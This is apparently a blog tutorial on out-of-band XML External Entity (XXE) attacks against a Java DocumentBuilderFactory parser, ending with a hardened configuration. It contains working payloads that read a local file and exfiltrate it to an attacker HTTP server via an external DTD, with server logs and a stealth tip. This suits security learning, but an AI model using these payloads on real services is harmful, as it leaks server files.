Parsers are always prone to the bugs and present one of the best attack surfaces for the exploitation. I was working on the service which takes XML input and performs some parsing, so I decided to check if and how exploitable it is.

Since I have access to the source, here is the snippet how the service handles XML:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setIgnoringElementContentWhitespace(true);
factory.setNamespaceAware(true);
DocumentBuilder parser = factory.newDocumentBuilder();
....
input = parser.parse(recieved);

So there is just basic DocumentBuilderFactory with only some additional configuration. I initially assumed, and most people probably do the same, that since we just want to parse the XML file there should be no issues.

Turns out this is very wrong, just parsing input using itself is dangerous. The DocumentBuilder is inherently unsafe if not configured properly. It works on the blacklist principle and allows by default a lot of unsafe options. I assume it is left like this due to backward compatibility with older code.

So let's take a look at how this setup could be exploited.

For the attacker server, I am just gonna use pythons simple HTTP server:

python -m http.server 8000 --bind 127.0.0.1

One of the first tests we can do is check if the service will do a callback to our server if presented with a specially crafted XML.

<?xml version="1.0"?>
    <!DOCTYPE doc [
      <!ENTITY % ent1 SYSTEM "http://127.0.0.1:8000/test">
      %ent1;
    ]>

If service is vulnerable we will see test resource being requested from our python server.

To better understand how this test works, we need to understand XML we sent. In the XML, we are defining DTD (Document Type Definition). The syntax for the internal DTD (one defined within XML document) is:

<!DOCTYPE root_element [DTD]>

There are some rules we should follow (but parsers are usually forgiving):

  • The document type declaration must be placed between the XML declaration and the first element (root element) in the document - well-formedness constraint.
  • The keyword DOCTYPE must be followed by the name of the root element in the XML document - validity constraint.
  • The keyword DOCTYPE must be in upper case

There are also external and combined DTD definitions, but we are not going to use them. For more information about DTD definitions you can take a look here or here.

Inside of DTD, we are a defining entity. Entities reference data that act as an abbreviation or can be found at an external location. They are used to reduce the entry of repetitive information and also allow for easier editing.

In DTD we are defining an external (parsed) parameter entity. Like all other parameter entities, they can be only used inside DTD.

The syntax for the internal parameter entity is:

<!ENTITY % name SYSTEM "URI">
%name;

Basically, with this DTD we are telling parser to visit URI we provide to find definition for our parameter and replace %name; with its value. This in itself is not a big security issue but it is a necessary part of the other attacks.

We can achieve the same effect with:

<?xml version="1.0"?>
    <!DOCTYPE doc [
      <!ELEMENT elm1 ANY >
      <!ENTITY ent1 SYSTEM "http://127.0.0.1:8000/test">
    ]>
    <elm1>&ent1;</elm1>

Here we use element type declarations to define a new element that may appear in the XML document. The syntax for the element is:

<!ELEMENT name allowable_contents>

The keyword ANY just allows all types of content in the element. We also define an external (parsed) general entity. General entities can only replace text inside the XML document instance, not DTD. The syntax for external (parsed) entities is:

<!ENTITY name SYSTEM "URI">

More information regarding entities can be found here.

These types of attacks are called XXE (XML External Entity).

For now, we have seen only how to get callback back from the XML parser. But this is not really useful. In my case of service I was testing, we don't get XML output back which complicates things. So we have to do out-of-band (OOB-XXE).

In case if service returns XML output, we can just do simpler in-band attack. I won't cover it here, but there are many resources available online.

So how we can get data? We have already seen that service will request the URL we provide, and this can be abused to get data back.

For testing, we will create the flag.txt file on C drive.

Our exploit:

<?xml version="1.0"?>
    <!DOCTYPE doc [
      <!ELEMENT elm1 ANY >
      <!ENTITY % file SYSTEM "file:///flag.txt">
      <!ENTITY % ent1 SYSTEM "http://127.0.0.1:8000/attack.dtd">
      %ent1;
    ]>
    <elm1>&res;</elm1>

Attack.dtd:

<!ENTITY % all "<!ENTITY res SYSTEM 'http://127.0.0.1:8000/%file;'>">
%all;

The exploit looks a bit more complicated than previous due to well-formedness constraint. In the internal DTD subset (which is quite strict), references to parameter entities are not allowed within markup declarations 123. We have to use an external DTD (separate file).

We also need to use a parameter entity to create an internal entity (which then can be used in markup) with content from our target file.

If the attack is successful, in our server log, we should see the content of flag.txt we created.

Serving HTTP on 127.0.0.1 port 8000 (http://127.0.0.1:8000/) ...
127.0.0.1 - - [09/Feb/2020 17:20:58] "GET /attack.dtd HTTP/1.1" 200 -
127.0.0.1 - - [09/Feb/2020 17:20:58] code 404, message File not found
127.0.0.1 - - [09/Feb/2020 17:20:58] "GET /U%20got%20the%20flag! HTTP/1.1" 404 -

For additional stealth, we can also move the line:

<!ENTITY % file SYSTEM "file:///flag.txt">

to attacker.dtd hiding the information about the file we are extracting.

There are also many other XML based attacks like Billion laughs, Quadratic Blowup etc, but I won't cover them here.

So as endnote, definitely double check security best practices when using parsers.

More secure parsing code:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);  // <----- added
factory.setIgnoringElementContentWhitespace(true);
factory.setNamespaceAware(true);
DocumentBuilder parser = factory.newDocumentBuilder();
....
input = parser.parse(recieved);

- F3real